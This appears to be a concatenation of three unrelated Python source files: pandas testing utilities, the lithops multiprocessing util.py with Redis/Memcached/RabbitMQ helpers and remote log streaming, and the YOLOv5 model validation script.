Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
def external_error_raised(expected_exception: Type[Exception],) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
util.py
|
#
# Module providing various facilities to other parts of the package
#
# multiprocessing/util.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
# Modifications Copyright (c) 2020 Cloudlab URV
#
import traceback
import socket
import weakref
import redis
import pymemcache
import pika
import cloudpickle
import uuid
import logging
import lithops
import sys
import threading
import io
import itertools
from lithops.config import load_config
from . import config as mp_config
logger = logging.getLogger(__name__)
#
# Picklable redis client
#
class PicklableRedis(redis.StrictRedis):
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
logger.debug('Creating picklable Redis client')
self._type = 'redis'
super().__init__(*self._args, **self._kwargs)
def __getstate__(self):
return self._args, self._kwargs
def __setstate__(self, state):
self.__init__(*state[0], **state[1])
def get_type(self):
return self._type
class PicklableMemcached(pymemcache.Client):
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
self._type = 'memcached'
super().__init__(*self._args, **self._kwargs)
def __getstate__(self):
return self._args, self._kwargs
def __setstate__(self, state):
self.__init__(*state[0], **state[1])
def get_type(self):
return self._type
#def get_redis_client(**overwrites):
def get_cache_client(**overwrites):
try:
if 'redis' in mp_config.get_parameter(mp_config.CACHE) :
conn_params = load_config()['redis']
elif 'memcached' in mp_config.get_parameter(mp_config.CACHE):
conn_params = load_config()['memcached']
except KeyError:
raise Exception('None cache section not found in you config')
conn_params.update(overwrites)
if 'redis' in mp_config.get_parameter(mp_config.CACHE) :
return PicklableRedis(**conn_params)
if 'memcached' in mp_config.get_parameter(mp_config.CACHE) :
return PicklableMemcached((conn_params['host'],conn_params['port']))
def get_amqp_client(**overwrites):
try:
if 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
conn_params = load_config()['rabbitmq']
except KeyError:
raise Exception('None cache section not found in you config')
conn_params.update(overwrites)
if 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
return pika.URLParameters(conn_params['amqp_url'])
#
# Helper functions
#
def get_uuid(length=12):
return uuid.uuid1().hex[:length]
def make_stateless_script(script):
# Make stateless redis Lua script (redis.client.Script)
# Just to ensure no redis client is cache'd and avoid
# creating another connection when unpickling this object.
script.registered_client = None
return script
def export_execution_details(futures, lithops_executor):
if mp_config.get_parameter(mp_config.EXPORT_EXECUTION_DETAILS):
try:
path = os.path.realpath(mp_config.get_parameter(mp_config.EXPORT_EXECUTION_DETAILS))
job_id = futures[0].job_id
plots_file_name = '{}_{}'.format(lithops_executor.executor_id, job_id)
lithops_executor.plot(fs=futures, dst=os.path.join(path, plots_file_name))
stats = {fut.call_id: fut.stats for fut in futures}
stats_file_name = '{}_{}_stats.json'.format(lithops_executor.executor_id, job_id)
with open(os.path.join(path, stats_file_name), 'w') as stats_file:
stats_json = json.dumps(stats, indent=4)
stats_file.write(stats_json)
except Exception as e:
logger.error('Error while exporting execution results: {}\n{}'.format(e, traceback.format_exc()))
def get_network_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.connect(('<broadcast>', 0))
return s.getsockname()[0]
#
# Remote logging
#
def setup_log_streaming(executor):
if mp_config.get_parameter(mp_config.STREAM_STDOUT):
stream = executor.executor_id
logger.debug('Log streaming enabled, stream name: {}'.format(stream))
remote_logger = RemoteLoggingFeed(stream)
remote_logger.start()
return remote_logger, stream
else:
return None, None
if 'redis' in mp_config.get_parameter(mp_config.CACHE):
#
# object for counting remote references (redis keys)
# and garbage collect them automatically when nothing
# is pointing at them
#
class RemoteReference:
def __init__(self, referenced, managed=False, client=None):
if isinstance(referenced, str):
referenced = [referenced]
if not isinstance(referenced, list):
raise TypeError("referenced must be a key (str) or"
"a list of keys")
self._referenced = referenced
# reference counter key
self._rck = '{}-{}'.format('ref', self._referenced[0])
self._referenced.append(self._rck)
self._client = client or get_cache_client()
self._callback = None
self.managed = managed
@property
def managed(self):
return self._callback is None
@managed.setter
def managed(self, value):
managed = value
if self._callback is not None:
self._callback.atexit = False
self._callback.detach()
if managed:
self._callback = None
else:
self._callback = weakref.finalize(self, type(self)._finalize,
self._client, self._rck, self._referenced)
def __getstate__(self):
return (self._rck, self._referenced,
self._client, self.managed)
def __setstate__(self, state):
(self._rck, self._referenced,
self._client) = state[:-1]
self._callback = None
self.managed = state[-1]
self.incref()
def incref(self):
if not self.managed:
pipeline = self._client.pipeline()
pipeline.incr(self._rck, 1)
pipeline.expire(self._rck, mp_config.get_parameter(mp_config.CACHE_EXPIRY_TIME))
counter, _ = pipeline.execute()
return int(counter)
def decref(self):
if not self.managed:
pipeline = self._client.pipeline()
pipeline.decr(self._rck, 1)
pipeline.expire(self._rck, mp_config.get_parameter(mp_config.CACHE_EXPIRY_TIME))
counter, _ = pipeline.execute()
return int(counter)
def refcount(self):
count = self._client.get(self._rck)
return 1 if count is None else int(count) + 1
def collect(self):
if len(self._referenced) > 0:
self._client.delete(*self._referenced)
self._referenced = []
@staticmethod
def _finalize(client, rck, referenced):
count = int(client.decr(rck, 1))
if count < 0 and len(referenced) > 0:
client.delete(*referenced)
elif 'memcached' in mp_config.get_parameter(mp_config.CACHE):
#
# object for counting remote references (redis keys)
# and garbage collect them automatically when nothing
# is pointing at them
#
class RemoteReference:
def __init__(self, referenced, managed=False, client=None):
if isinstance(referenced, str):
referenced = [referenced]
if not isinstance(referenced, list):
raise TypeError("referenced must be a key (str) or"
"a list of keys")
self._referenced = referenced
# reference counter key
self._rck = '{}-{}'.format('ref', self._referenced[0])
self._referenced.append(self._rck)
self._client = client or get_cache_client()
self._client.set(self._rck, 0)
self._callback = None
self.managed = managed
@property
def managed(self):
return self._callback is None
@managed.setter
def managed(self, value):
managed = value
if self._callback is not None:
self._callback.atexit = False
self._callback.detach()
if managed:
self._callback = None
else:
self._callback = weakref.finalize(self, type(self)._finalize,
self._client, self._rck, self._referenced)
def __getstate__(self):
return (self._rck, self._referenced,
self._client, self.managed)
def __setstate__(self, state):
(self._rck, self._referenced,
self._client) = state[:-1]
self._callback = None
self.managed = state[-1]
self.incref()
def incref(self):
if not self.managed:
return int(self._client.incr(self._rck, 1))
def decref(self):
if not self.managed:
return int(self._client.decr(self._rck, 1))
def refcount(self):
count = int(self._client.get(self._rck))
return 1 if count is None else int(count) + 1
def collect(self):
if len(self._referenced) > 0:
for ref in self._referenced:
self._client.delete(ref)
self._referenced = []
@staticmethod
def _finalize(client, rck, referenced):
count = int(client.decr(rck, 1))
if count < 0 and len(referenced) > 0:
for ref in self._referenced:
self._client.delete(ref)
pass
if 'redis' in mp_config.get_parameter(mp_config.CACHE) and mp_config.get_parameter(mp_config.AMQP) == '':
class RemoteLogIOBuffer:
def __init__(self, stream):
self._feeder_thread = threading
self._buff = io.StringIO()
self._client = get_cache_client()
self._stream = stream
self._offset = 0
def write(self, log):
self._buff.write(log)
# self.flush()
self._old_stdout.write(log)
def flush(self):
self._buff.seek(self._offset)
log = self._buff.read()
self._client.publish(self._stream, log)
self._offset = self._buff.tell()
# self._buff = io.StringIO()
# FIXME flush() does not empty the buffer?
self._buff.flush()
def start(self):
import sys
self._old_stdout = sys.stdout
sys.stdout = self
logger.debug('Starting remote logging feed to stream %s', self._stream)
def stop(self):
import sys
sys.stdout = self._old_stdout
logger.debug('Stopping remote logging feed to stream %s', self._stream)
class RemoteLoggingFeed:
def __init__(self, stream):
self._logger_thread = threading.Thread(target=self._logger_monitor, args=(stream,))
self._stream = stream
self._enabled = False
def _logger_monitor(self, stream):
logger.debug('Starting logger monitor thread for stream {}'.format(stream))
cache_pubsub = get_cache_client().pubsub()
cache_pubsub.subscribe(stream)
while self._enabled:
msg = cache_pubsub.get_message(ignore_subscribe_messages=True, timeout=1)
if msg is None:
continue
if 'data' in msg:
sys.stdout.write(msg['data'].decode('utf-8'))
logger.debug('Logger monitor thread for stream {} finished'.format(stream))
def start(self):
# self._logger_thread.daemon = True
self._enabled = True
self._logger_thread.start()
def stop(self):
self._enabled = False
self._logger_thread.join(5)
elif 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
class RemoteLogIOBuffer:
def __init__(self, stream):
self._feeder_thread = threading
self._buff = io.StringIO()
self._parameters = get_amqp_client()
self._stream = stream
self._connection = pika.BlockingConnection(self._parameters)
self._channel = self._connection.channel()
self._channel.exchange_declare(exchange='exchange-'+self._stream, exchange_type='fanout')
self._channel.queue_declare(queue=self._stream)
self._channel.queue_bind(exchange='exchange-'+self._stream, queue=self._stream)
self._offset = 0
def write(self, log):
self._buff.write(log)
# self.flush()
self._old_stdout.write(log)
def flush(self):
self._buff.seek(self._offset)
log = self._buff.read()
self._channel.basic_publish(exchange='exchange-'+self._stream,routing_key=self._stream,body=log)
self._offset = self._buff.tell()
# self._buff = io.StringIO()
# FIXME flush() does not empty the buffer?
self._buff.flush()
def start(self):
import sys
self._old_stdout = sys.stdout
sys.stdout = self
logger.debug('Starting remote logging feed to stream %s', self._stream)
def stop(self):
import sys
sys.stdout = self._old_stdout
logger.debug('Stopping remote logging feed to stream %s', self._stream)
class RemoteLoggingFeed:
def __init__(self, stream):
self._logger_thread = threading.Thread(target=self._logger_monitor, args=(stream,))
self._parameters = get_amqp_client()
self._stream = stream
self._connection = pika.BlockingConnection(self._parameters)
self._channel = self._connection.channel()
self._channel.exchange_declare(exchange='exchange-'+self._stream, exchange_type='fanout')
self._channel.queue_declare(queue=self._stream)
self._channel.queue_bind(exchange='exchange-'+self._stream, queue=self._stream)
self._enabled = False
def _logger_monitor(self, stream):
while self._enabled:
method, properties, body = self._channel.basic_get(queue=self._stream, auto_ack=False)
msg = body
if msg is None:
continue
else:
sys.stdout.write(msg.decode('utf-8'))
logger.debug('Logger monitor thread for stream {} finished'.format(stream))
def start(self):
# self._logger_thread.daemon = True
self._enabled = True
self._logger_thread.start()
def stop(self):
self._enabled = False
self._logger_thread.join(5)
_afterfork_registry = weakref.WeakValueDictionary()
_afterfork_counter = itertools.count()
def _run_after_forkers():
items = list(_afterfork_registry.items())
items.sort()
for (index, ident, func), obj in items:
try:
func(obj)
except Exception as e:
info('after forker raised exception %s', e)
def register_after_fork(obj, func):
_afterfork_registry[(next(_afterfork_counter), id(obj), func)] = obj
#
# Finalization using weakrefs
#
_finalizer_registry = {}
_finalizer_counter = itertools.count()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / 'runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device, pt = next(model.parameters()).device, True # get model device, PyTorch model
half &= device.type != 'cpu' # half precision only supported on CUDA
model.half() if half else model.float()
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = DetectMultiBackend(weights, device=device, dnn=dnn)
stride, pt = model.stride, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
half &= pt and device.type != 'cpu' # half precision only supported by PyTorch on CUDA
if pt:
model.model.half() if half else model.model.float()
else:
half = False
batch_size = 1 # export.py models default to batch-size 1
device = torch.device('cpu')
LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')
# Data
data = check_dataset(data) # check
# Configure
model.eval()
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if pt and device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.model.parameters()))) # warmup
pad = 0.0 if task == 'speed' else 0.5
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=pt,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (im, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
if pt:
im = im.to(device, non_blocking=True)
targets = targets.to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
nb, _, height, width = im.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Inference
out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs
dt[1] += time_sync() - t2
# Loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Metrics
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, im[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()
# Compute metrics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
LOGGER.info(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
